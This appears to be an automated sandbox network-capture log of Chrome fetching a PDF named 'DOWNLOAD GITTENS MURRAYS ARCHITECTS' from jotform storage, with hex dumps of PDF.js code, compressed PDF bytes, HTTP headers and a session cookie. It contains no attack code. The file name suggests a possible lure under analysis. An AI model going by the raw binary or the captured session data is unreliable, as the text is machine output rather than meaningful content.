                                                                                                                                                                                                                                            2025-01-10 12:36:25 UTC1369INData Raw: 4e 6f 64 65 4a 53 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 70 61 72 74 69 61 6c 4d 73 67 20 2b 20 22 70 6c 65 61 73 65 20 75 73 65 20 61 20 60 6c 65 67 61 63 79 60 2d 62 75 69 6c 64 20 69 6e 73 74 65 61 64 2e 22 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 70 61 72 74 69 61 6c 4d 73 67 20 2b 20 22 70 6c 65 61 73 65 20 75 70 64 61 74 65 20 74 6f 20 61 20 73 75 70 70 6f 72 74 65 64 20 62 72 6f 77 73 65 72 2e 22 29 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 76 61 72 20 64 6f 63 49 64 20 3d 20 64 6f 63 50 61 72 61 6d 73 2e 64 6f 63 49 64 3b 0a 20 20 20 20 20 20 76 61 72 20 64 6f 63 42 61 73 65 55 72 6c 20 3d 20 64 6f 63 50 61 72 61 6d
                                                                                                                                                                                                                                            Data Ascii: NodeJS) { throw new Error(partialMsg + "please use a `legacy`-build instead."); } throw new Error(partialMsg + "please update to a supported browser."); } var docId = docParams.docId; var docBaseUrl = docParam
                                                                                                                                                                                                                                            2025-01-10 12:36:25 UTC1369INData Raw: 20 20 20 20 72 65 74 75 72 6e 20 70 64 66 4d 61 6e 61 67 65 72 2e 65 6e 73 75 72 65 44 6f 63 28 22 63 68 65 63 6b 48 65 61 64 65 72 22 29 3b 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 61 73 65 20 32 3a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 5f 63 6f 6e 74 65 78 74 2e 6e 65 78 74 20 3d 20 34 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 70 64 66 4d 61 6e 61 67 65 72 2e 65 6e 73 75 72 65 44 6f 63 28 22 70 61 72 73 65 53 74 61 72 74 58 52 65 66 22 29 3b 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 61 73 65 20 34 3a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 5f 63 6f 6e 74 65 78 74 2e 6e 65 78 74 20 3d 20 36 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                            Data Ascii: return pdfManager.ensureDoc("checkHeader"); case 2: _context.next = 4; return pdfManager.ensureDoc("parseStartXRef"); case 4: _context.next = 6;
                                                                                                                                                                                                                                            2025-01-10 12:36:25 UTC1369INData Raw: 20 50 72 6f 6d 69 73 65 2e 61 6c 6c 28 5b 70 64 66 4d 61 6e 61 67 65 72 2e 65 6e 73 75 72 65 44 6f 63 28 22 6e 75 6d 50 61 67 65 73 22 29 2c 20 70 64 66 4d 61 6e 61 67 65 72 2e 65 6e 73 75 72 65 44 6f 63 28 22 66 69 6e 67 65 72 70 72 69 6e 74 73 22 29 5d 29 3b 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 61 73 65 20 32 30 3a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 5f 79 69 65 6c 64 24 50 72 6f 6d 69 73 65 24 61 6c 6c 20 3d 20 5f 63 6f 6e 74 65 78 74 2e 73 65 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 5f 79 69 65 6c 64 24 50 72 6f 6d 69 73 65 24 61 6c 6c 32 20 3d 20 5f 73 6c 69 63 65 64 54 6f 41 72 72 61 79 28 5f 79 69 65 6c 64 24 50 72 6f 6d 69 73 65 24 61 6c 6c 2c 20 32 29 3b 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                            Data Ascii: Promise.all([pdfManager.ensureDoc("numPages"), pdfManager.ensureDoc("fingerprints")]); case 20: _yield$Promise$all = _context.sent; _yield$Promise$all2 = _slicedToArray(_yield$Promise$all, 2);


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            107192.168.2.1749822104.19.128.1054435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:25 UTC643OUTGET /uploads/Gittens_Murray/form_files/DOWNLOAD%20GITTENS%20MURRAYS%20ARCHITECTS.678101120618b4.41192529.pdf HTTP/1.1
                                                                                                                                                                                                                                            Host: www.jotform.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Origin: https://eu.jotform.com
                                                                                                                                                                                                                                            Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                            Referer: https://eu.jotform.com/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:36:25 UTC731INHTTP/1.1 302 Found
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:25 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
                                                                                                                                                                                                                                            expires: Fri, 10 Jan 2025 13:36:25 GMT
                                                                                                                                                                                                                                            last-modified: Fri, 10 Jan 2025 12:05:30 GMT
                                                                                                                                                                                                                                            Cache-Control: public, max-age=3600
                                                                                                                                                                                                                                            pragma: no-cache
                                                                                                                                                                                                                                            jf-trace-id: 2035ad4e1deee5bd
                                                                                                                                                                                                                                            strict-transport-security: max-age=31536000;
                                                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                                                            location: https://eu-files.jotform.com/jufs/Gittens_Murray/form_files/DOWNLOAD%20GITTENS%20MURRAYS%20ARCHITECTS.678101120618b4.41192529.pdf?md5=ufTBvV4o_hZ61vxTbutwig&expires=1736510740
                                                                                                                                                                                                                                            via: 1.1 google
                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                            Age: 1855
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb66bcc604277-EWR


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            108192.168.2.174982334.107.251.1254435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:25 UTC1002OUTGET /jufs/Gittens_Murray/form_files/DOWNLOAD%20GITTENS%20MURRAYS%20ARCHITECTS.678101120618b4.41192529.pdf?md5=WCrTkI0L9lPxBmDI1lEqmg&expires=1736512594 HTTP/1.1
                                                                                                                                                                                                                                            Host: eu-files.jotform.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                            Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                            Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                            Sec-Fetch-User: ?1
                                                                                                                                                                                                                                            Sec-Fetch-Dest: document
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Referer: https://eu.jotform.com/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            Cookie: guest=guest_5a3c5173c0bb4f63; JOTFORM_SESSION=62953b85-a26b-4264-9cab-272a8b54; userReferer=https%3A%2F%2Feu.jotform.com%2Fapp%2F250092704521347
                                                                                                                                                                                                                                            2025-01-10 12:36:25 UTC628INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            access-control-allow-headers: Content-Type, Content-Length, Accept-Encoding, X-CSRF-Token, Authorization, accept, origin, Cache-Control, X-Requested-With, newrelic, traceparent, tracestate
                                                                                                                                                                                                                                            access-control-allow-methods: OPTIONS, GET
                                                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                                                            cache-control: public,max-age=7200
                                                                                                                                                                                                                                            content-disposition: attachment; filename="DOWNLOAD GITTENS MURRAYS ARCHITECTS.678101120618b4.41192529.pdf"
                                                                                                                                                                                                                                            content-type: application/octet-stream
                                                                                                                                                                                                                                            date: Fri, 10 Jan 2025 12:36:25 GMT
                                                                                                                                                                                                                                            via: 1.1 google
                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            2025-01-10 12:36:25 UTC762INData Raw: 33 34 36 33 0d 0a 25 50 44 46 2d 31 2e 33 0a 25 c4 e5 f2 e5 eb a7 f3 a0 d0 c4 c6 0a 33 20 30 20 6f 62 6a 0a 3c 3c 20 2f 46 69 6c 74 65 72 20 2f 46 6c 61 74 65 44 65 63 6f 64 65 20 2f 4c 65 6e 67 74 68 20 33 32 31 39 20 3e 3e 0a 73 74 72 65 61 6d 0a 78 01 bd 5a 59 93 1c 39 11 7e af 5f 21 7b cc 7a 1a bb cb a5 ab 0e 6e bc cb 03 3c b1 11 1d c1 03 c3 03 e1 f0 c6 b2 31 b3 60 7b f9 ff 7c 79 49 aa ee ea 63 20 02 cc 4e 55 aa a4 54 2a ef 4c f5 27 f7 ad fb e4 de 7d fd c5 bb 0f 5f 9c e7 7f 5f 3e b8 29 e0 ff 83 7b 72 39 c8 db 23 bf c5 c9 f7 39 b8 47 fa 5e de bf 77 df b9 a1 5f a6 90 d3 32 74 e5 ad 8e b9 f3 08 c7 25 f7 61 16 84 e5 9d 10 7a 5a 3e 0e d3 9c 22 50 ce 43 5c 82 1f 19 51 ee 3d 48 f2 13 3d 9e 9c f7 c9 80 47 06 0a 96 89 27 16 90 90 7e db 7d 72 53 76 18 73 69 70
                                                                                                                                                                                                                                            Data Ascii: 3463%PDF-1.3%3 0 obj<< /Filter /FlateDecode /Length 3219 >>streamxZY9~_!{zn<1`{|yIc NUT*L'}__>){r9#9G^w_2t%azZ>"PC\Q=H=G'~}rSvsip
                                                                                                                                                                                                                                            2025-01-10 12:36:25 UTC1390INData Raw: f6 38 db 4a 01 8a 11 46 92 85 48 e1 ba 6e 29 07 ab e5 f9 05 5e 3c cc 1b 06 72 9f 6e b6 bc 16 5d 98 fb e8 d9 12 d6 f6 d6 1a f2 d5 d8 d3 46 68 28 e8 dc 71 84 a6 e0 37 79 82 39 64 26 81 63 3f 51 d4 94 38 3d 21 90 32 48 41 80 82 48 5d 62 01 0c 21 57 51 94 80 a6 6b ca fc 06 87 85 7f 8a 42 12 cb 68 33 79 a3 9c a3 b3 9d 57 91 4f 31 51 0c b7 6d 35 b8 6f 04 4d a2 51 56 03 99 c5 4d 04 3f 8c b9 84 58 80 d4 e9 28 6c 52 3e 70 2d 23 e8 de 1f 60 a8 34 0f 39 16 b8 82 8c 20 bb 38 2f b7 65 04 1b e9 57 93 92 9d 4f c4 0a 6f 39 78 2b 9f e9 4c 72 1e 4a 72 c0 c7 90 fa 4c e1 5b 93 36 81 5d 8a a1 4f 9a c4 95 f7 86 1f 29 4d 0e f1 32 9c 24 5c 0d 65 1b 74 93 2e 2d 81 d2 87 9c a7 7e e0 dc 8b 09 30 18 e2 34 38 c3 19 42 08 36 9d 40 48 9b 68 b8 85 e5 48 c2 e0 02 69 26 cc 29 0f bd 4f 39
                                                                                                                                                                                                                                            Data Ascii: 8JFHn)^<rn]Fh(q7y9d&c?Q8=!2HAH]b!WQkBh3yWO1Qm5oMQVM?X(lR>p-#`49 8/eWOo9x+LrJrL[6]O)M2$\et.-~048B6@HhHi&)O9
                                                                                                                                                                                                                                            2025-01-10 12:36:25 UTC1390INData Raw: 4e 3d c2 a2 8f d9 f8 79 7a 3f c4 7d 4f 22 38 a2 9b 41 17 12 c3 c9 b6 a7 ac 69 d8 d5 32 69 8b f7 c0 5b 9a 3d e5 bd 39 ae ed 8b f8 dd 34 bf 3a 5c 2e 6e 88 a4 19 c3 be 33 df e9 45 54 b3 d2 7e 1b 5a 18 92 67 b8 2b 9b ea 74 a3 87 e5 5f 38 0a cc 17 d2 7c e8 52 80 6a 51 1f 5a fd 3a d5 9c f0 4a d4 f6 f1 e0 9c a4 62 e6 d8 ef 90 86 99 5f 3a 17 27 34 79 2d f8 38 d6 40 11 b7 f0 1d b9 b9 63 69 75 ed 9d e4 55 ae 6d 2b a7 a8 74 a7 cc e4 c8 5b de 1b 69 99 72 a2 df d5 48 8b ae 82 37 f6 a5 f8 a1 46 a5 5a 22 bc 57 0b 35 41 98 85 8e da 12 24 a3 e0 f7 76 5f 98 2f b7 48 d3 a9 e3 b1 3d ea 6e f5 ad 6a 09 0a fa c8 4d 5a d5 12 86 c9 24 15 1e 50 3b 12 01 aa 25 06 b2 96 68 35 75 a5 a2 52 89 52 9a 89 3b 50 e8 4a cc ac 2c 78 c4 51 fb b2 7b d8 a4 35 47 82 56 f5 a8 c1 e9 ae 71 e6 0b bf
                                                                                                                                                                                                                                            Data Ascii: N=yz?}O"8Ai2i[=94:\.n3ET~Zg+t_8|RjQZ:Jb_:'4y-8@ciuUm+t[irH7FZ"W5A$v_/H=njMZ$P;%h5uRR;PJ,xQ{5GVq
                                                                                                                                                                                                                                            2025-01-10 12:36:25 UTC1390INData Raw: 20 30 20 52 20 2f 54 54 34 20 39 20 30 20 52 20 2f 54 54 36 20 31 31 20 30 20 52 20 2f 54 54 38 20 31 33 20 30 20 52 20 2f 54 54 39 20 31 36 20 30 20 52 20 2f 54 54 31 31 0a 31 38 20 30 20 52 20 2f 54 54 31 33 20 32 30 20 30 20 52 20 2f 54 54 31 35 20 32 32 20 30 20 52 20 2f 54 54 31 37 20 32 34 20 30 20 52 20 2f 54 54 31 39 20 32 36 20 30 20 52 20 2f 54 54 32 31 20 32 39 20 30 20 52 20 2f 54 54 32 33 0a 33 31 20 30 20 52 20 2f 54 54 32 35 20 33 33 20 30 20 52 20 3e 3e 20 2f 58 4f 62 6a 65 63 74 20 3c 3c 20 2f 49 6d 31 20 33 34 20 30 20 52 20 2f 49 6d 32 20 33 35 20 30 20 52 20 2f 49 6d 33 20 33 36 20 30 20 52 20 2f 49 6d 34 0a 33 37 20 30 20 52 20 3e 3e 20 3e 3e 0a 65 6e 64 6f 62 6a 0a 31 34 20 30 20 6f 62 6a 0a 5b 20 31 35 20 30 20 52 20 32 37 20 30 20
                                                                                                                                                                                                                                            Data Ascii: 0 R /TT4 9 0 R /TT6 11 0 R /TT8 13 0 R /TT9 16 0 R /TT1118 0 R /TT13 20 0 R /TT15 22 0 R /TT17 24 0 R /TT19 26 0 R /TT21 29 0 R /TT2331 0 R /TT25 33 0 R >> /XObject << /Im1 34 0 R /Im2 35 0 R /Im3 36 0 R /Im437 0 R >> >>endobj14 0 obj[ 15 0 R 27 0
                                                                                                                                                                                                                                            2025-01-10 12:36:25 UTC1390INData Raw: d8 a6 6b 09 ad 9c 35 7f e5 9f 47 3f 6a 1f c8 1c 7b cc b1 ef 7a e7 bb 3e f1 f1 4f 68 c1 d3 4e 3d f5 94 cf 9c f2 d1 8f 7c f4 bd ef 79 cf 1b 5f ff 06 8d 78 e8 21 4f 7b d4 5e 8f 5c 1f 6f 54 a9 52 af e3 de f8 a6 88 a7 e3 ac d5 be 8a e4 ac b5 67 1e fa 8c e8 5e ca ac 9a 53 6b 5a b5 68 19 93 fa 54 4d 6b 94 7d f7 79 4c 34 a7 6d b5 e4 ac 6f e9 e9 40 90 7c f6 61 87 3f e5 49 4f c6 1e bb 3c e0 81 6a c1 b8 c2 60 2b 76 75 7d 6f 8b 5b 5b f2 71 6f 3a ee e8 57 bf 86 6c 8a 3d e8 c0 c7 ef fa e0 87 de fd ce 77 85 2a 3e 61 d8 d4 d2 96 d3 e9 dd b7 bf f5 6d 0d 3d 41 f5 79 cf 79 ae a2 7a b2 a5 34 26 b4 f1 eb c0 fd 0f 78 e5 51 af 20 c6 d3 9e 72 08 46 62 1a 2d bf 2b bf 86 63 ef 7d 8f 7b 1a ef d4 e2 35 af 7a b5 21 8f ed bd fc 6c 9e 42 77 ec 9c d7 bf f6 75 9f fa e4 27 71 ce 99 df 3d
                                                                                                                                                                                                                                            Data Ascii: k5G?j{z>OhN=|y_x!O{^\oTRg^SkZhTMk}yL4mo@|a?IO<j`+vu}o[[qo:Wl=w*>am=Ayyz4&xQ rFb-+c}{5z!lBwu'q=
                                                                                                                                                                                                                                            2025-01-10 12:36:25 UTC1390INData Raw: c0 4c e5 2f 2b 0d ad 55 f6 0b 43 d2 2e e1 a0 27 1e 74 30 b3 93 26 4b f7 ac bb da 8b ab 2e a5 bf d0 3a 5d 9e 26 ac ba ee 77 ef fb 18 44 34 8a 8a f0 1d 04 31 c8 83 2a 57 65 f3 27 13 51 df f1 76 97 84 3f db 3c 1e f4 b8 42 14 a5 40 c5 2a dc 2b da 9c 84 21 52 ad 6f 95 5f 2b 60 e0 f6 a9 f6 0e 49 50 50 1d 01 ab d6 fd fd ef 7f a7 4e fe 49 8c 8c 4a 69 af 5a 42 af c7 85 db d1 cb 97 be f8 25 83 3b 96 63 f6 68 a0 1a 77 8d 9e 10 8f 90 c6 0e 46 2c 37 1c fd 8e fb 86 55 cf ab 54 95 37 d0 88 2e 49 85 e0 59 f3 2f a7 e3 1f 71 3d 8c a1 28 94 9d 46 21 ff f4 a7 3f 55 cd a9 25 6c 7d 16 ea 69 a3 be 89 fc d5 97 a6 b1 01 a8 0a f0 0d 34 bc 09 43 79 8d 34 46 fe 8a 9b ae 4a 2d f1 15 b5 ac ba c4 21 4a 47 d3 40 c6 11 e4 63 1c a4 36 88 88 45 c4 35 a3 f3 15 8d 5e ba a2 7a fe ef cf d7 cd
                                                                                                                                                                                                                                            Data Ascii: L/+UC.'t0&K.:]&wD41*We'Qv?<B@*+!Ro_+`IPPNIJiZB%;chwF,7UT7.IY/q=(F!?U%l}i4Cy4FJ-!JG@c6E5^z
                                                                                                                                                                                                                                            2025-01-10 12:36:25 UTC1390INData Raw: aa 2a 5b 58 0b 9b 21 1f d3 34 82 63 1e 79 d0 03 77 ee b1 56 7d 76 ad e9 c9 42 41 ac b6 63 7a ab 79 52 4a 45 57 63 c1 8a 54 5b 73 62 c2 d7 78 c7 90 6e 71 6e 4b 68 59 c8 8c b0 91 ee 98 a3 8f 61 51 24 3e 6c f9 93 02 b5 f8 66 57 f0 b6 6f 59 eb 9d 56 2a cb 9e cd b6 33 f5 99 34 22 45 3a 20 52 b2 fd b0 57 72 fa 2c 53 c1 b8 9c e5 31 89 9a 42 c6 b3 5c 0f f3 fe 97 2d 16 8a f7 64 94 17 dd ca 7c a8 fe a5 cf 56 04 2a 6e e3 2c c4 7f d1 fd 99 19 b4 65 d9 72 08 aa 3c 29 01 6d 7c c5 7c 12 d8 31 55 2a de c2 2e 15 50 62 84 b3 c0 0d 55 23 31 ea d8 2d a6 c2 3d c5 29 23 70 f5 b6 f2 2e 4b 53 ac 55 b0 b8 51 b1 34 99 dd b5 1c 61 c8 8a 74 13 88 a6 11 13 9f e7 8e a9 60 8f b5 2a 7a 6b 4d 4f 16 0a 62 55 eb c2 42 6c 57 ab 49 0d 16 96 98 8a 4e 1b 3e 12 dd ed ad 32 6d 4b 68 59 28 eb 5d
                                                                                                                                                                                                                                            Data Ascii: *[X!4cywV}vBAczyRJEWcT[sbxnqnKhYaQ$>lfWoYV*34"E: RWr,S1B\-d|V*n,er<)m||1U*.PbU#1-=)#p.KSUQ4at`*zkMObUBlWIN>2mKhY(]
                                                                                                                                                                                                                                            2025-01-10 12:36:25 UTC1390INData Raw: 49 2c 9c 05 4f f7 75 4c d1 2d f0 62 15 0b 2f 21 c0 99 6a b5 b4 e2 96 38 4f 5a a4 96 c9 92 a4 4b ca f1 13 93 92 67 ad 11 75 73 7d 8d d1 d5 6b af 8a ea 32 c3 30 b1 f0 9b c2 05 af 5a a6 6a 65 ce 1d 06 ad c1 8b e6 a0 b8 b4 6c d6 1c d2 2b 4e a8 91 d4 96 ae de b3 f5 fe 5a db 2e 51 29 46 35 90 7b 66 80 21 60 e5 ec a0 fa ae 11 5d aa f9 93 ae 6d b4 3e ed aa 65 d6 fa 6e 84 85 28 d8 45 ee a9 cf 1e ff b5 46 75 62 eb ea 80 06 3e c6 3c e5 61 3f 60 24 c3 2b d3 7a 7d 98 44 1b 85 02 ec 1d 30 3c 31 bf b9 63 7a 0a d7 8c c2 f0 02 30 12 45 b2 11 40 84 81 05 d2 ee fb ae 18 f6 d2 bd 96 4a 8d 32 23 4c 57 fd 53 1d 7f d6 be 53 fd 02 9e 23 15 82 de 4a 7c 72 44 73 6a cb ae 4f 4f d6 ea 91 65 e6 9d 45 c4 35 ab 7d 01 f3 c0 d3 4d 4a 62 6a 0f e5 32 57 98 a3 28 68 b3 ab 0a 2b 6e 59 53 94
                                                                                                                                                                                                                                            Data Ascii: I,OuL-b/!j8OZKgus}k20Zjel+NZ.Q)F5{f!`]m>en(EFub><a?`$+z}D0<1cz0E@J2#LWSS#J|rDsjOOeE5}MJbj2W(h+nYS
                                                                                                                                                                                                                                            2025-01-10 12:36:25 UTC1390INData Raw: 0b 85 31 4c 35 2a 2d 51 65 74 a4 c9 7a eb f7 2a 6e 3d 16 0a 7a 8c 2e cb ae 32 73 8a 2b 98 43 bd 93 eb 0c 1f 0c a1 9c ae 16 5f 9e 71 2b 94 54 3d c7 36 2d 83 6c d9 c9 38 7e 06 c2 88 fc 2d da f5 4e f4 9c 5b 87 63 13 9b 1a f1 64 6b 09 49 4f 16 6a 31 e9 dd a9 ad 36 c2 21 99 2f 13 51 d1 34 da 48 18 59 24 50 cc 33 67 67 8d 94 d0 93 a4 de af fd 0b d7 ad e3 6c c6 91 7a d5 78 29 d7 43 9f d2 8f 6c a6 66 17 51 7b 31 52 4c d8 ee ef 18 61 a1 ea f1 e5 9c 0a 21 5c 6a 49 c3 85 9e 6a 4d db b4 88 3d c2 c1 1b 02 2f 10 e6 56 e8 e9 3c 82 36 67 45 69 19 f9 7c bd 2e 67 bd 2e 47 72 2a 6e 3d 16 8a 24 59 9f c3 93 65 b0 91 13 5c 78 86 a7 d6 b2 65 c5 b9 9d 0b 68 eb 95 3b 35 02 30 1e a3 1e 97 bf f7 de c4 06 71 ac 63 1f 32 4f b7 be 71 64 b2 50 0f e1 f6 7e 6d b5 65 4d ce b3 b1 57 6d 4c
                                                                                                                                                                                                                                            Data Ascii: 1L5*-Qetz*n=z.2s+C_q+T=6-l8~-N[cdkIOj16!/Q4HY$P3gglzx)ClfQ{1RLa!\jIjM=/V<6gEi|.g.Gr*n=$Ye\xeh;50qc2OqdP~meMWmL
                                                                                                                                                                                                                                            2025-01-10 12:36:25 UTC1390INData Raw: 5e af ba 62 3f 7b 42 8d 74 0b 6b e4 c6 35 27 56 7d d6 36 44 87 8d a7 d9 33 e2 15 aa 2f 1e 1e 04 52 77 aa ab d6 32 20 2b 56 10 0a 5a 5e 9f 50 f5 a7 87 7c 45 29 8c 61 eb a5 61 3a de 6e fb 55 a6 8a db 78 2f 36 4c e8 a7 f1 22 33 17 9f 73 a8 18 5a 22 45 1c 31 8c 27 d8 be 72 46 53 95 6a 39 5d 7d 3a 76 85 39 d9 9c 10 db 1b 95 d6 27 7f 4f 86 b4 60 d6 e5 0a 4d 9b e8 34 a0 a0 97 44 8a 68 a9 ca 42 7e d5 b5 c9 7d 3b ef 3c 79 84 4c c5 13 8c aa d5 4b ad ef 1a d7 a5 fa 54 ad e3 48 bb d7 67 db 74 d5 a2 8d b0 50 fa 0e 9d b9 c8 7f 62 92 9b 96 d7 96 2f e0 6c a4 46 35 82 67 74 40 44 3d 4c 78 ca cc 54 56 10 23 c7 22 37 93 d7 e6 d7 74 b7 da 7c 06 8e d8 00 3a 88 fe 48 d9 04 1c a8 71 6c fb 16 bd e5 3b e3 f5 4a 8c 3a ab 2e c3 e7 cb fb 05 c6 35 27 56 7d 76 b8 44 87 cd bb 61 18 fa
                                                                                                                                                                                                                                            Data Ascii: ^b?{Btk5'V}6D3/Rw2 +VZ^P|E)aa:nUx/6L"3sZ"E1'rFSj9]}:v9'O`M4DhB~};<yLKTHgtPb/lF5gt@D=LxTV#"7t|:Hql;J:.5'V}vDa


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            109192.168.2.174982434.107.251.1254435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:26 UTC673OUTGET /jufs/Gittens_Murray/form_files/DOWNLOAD%20GITTENS%20MURRAYS%20ARCHITECTS.678101120618b4.41192529.pdf?md5=ufTBvV4o_hZ61vxTbutwig&expires=1736510740 HTTP/1.1
                                                                                                                                                                                                                                            Host: eu-files.jotform.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Origin: null
                                                                                                                                                                                                                                            Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                            Referer: https://eu.jotform.com/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:36:26 UTC628INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            access-control-allow-headers: Content-Type, Content-Length, Accept-Encoding, X-CSRF-Token, Authorization, accept, origin, Cache-Control, X-Requested-With, newrelic, traceparent, tracestate
                                                                                                                                                                                                                                            access-control-allow-methods: OPTIONS, GET
                                                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                                                            cache-control: public,max-age=7200
                                                                                                                                                                                                                                            content-disposition: attachment; filename="DOWNLOAD GITTENS MURRAYS ARCHITECTS.678101120618b4.41192529.pdf"
                                                                                                                                                                                                                                            content-type: application/octet-stream
                                                                                                                                                                                                                                            date: Fri, 10 Jan 2025 12:36:26 GMT
                                                                                                                                                                                                                                            via: 1.1 google
                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            2025-01-10 12:36:26 UTC762INData Raw: 33 34 36 33 0d 0a 25 50 44 46 2d 31 2e 33 0a 25 c4 e5 f2 e5 eb a7 f3 a0 d0 c4 c6 0a 33 20 30 20 6f 62 6a 0a 3c 3c 20 2f 46 69 6c 74 65 72 20 2f 46 6c 61 74 65 44 65 63 6f 64 65 20 2f 4c 65 6e 67 74 68 20 33 32 31 39 20 3e 3e 0a 73 74 72 65 61 6d 0a 78 01 bd 5a 59 93 1c 39 11 7e af 5f 21 7b cc 7a 1a bb cb a5 ab 0e 6e bc cb 03 3c b1 11 1d c1 03 c3 03 e1 f0 c6 b2 31 b3 60 7b f9 ff 7c 79 49 aa ee ea 63 20 02 cc 4e 55 aa a4 54 2a ef 4c f5 27 f7 ad fb e4 de 7d fd c5 bb 0f 5f 9c e7 7f 5f 3e b8 29 e0 ff 83 7b 72 39 c8 db 23 bf c5 c9 f7 39 b8 47 fa 5e de bf 77 df b9 a1 5f a6 90 d3 32 74 e5 ad 8e b9 f3 08 c7 25 f7 61 16 84 e5 9d 10 7a 5a 3e 0e d3 9c 22 50 ce 43 5c 82 1f 19 51 ee 3d 48 f2 13 3d 9e 9c f7 c9 80 47 06 0a 96 89 27 16 90 90 7e db 7d 72 53 76 18 73 69 70
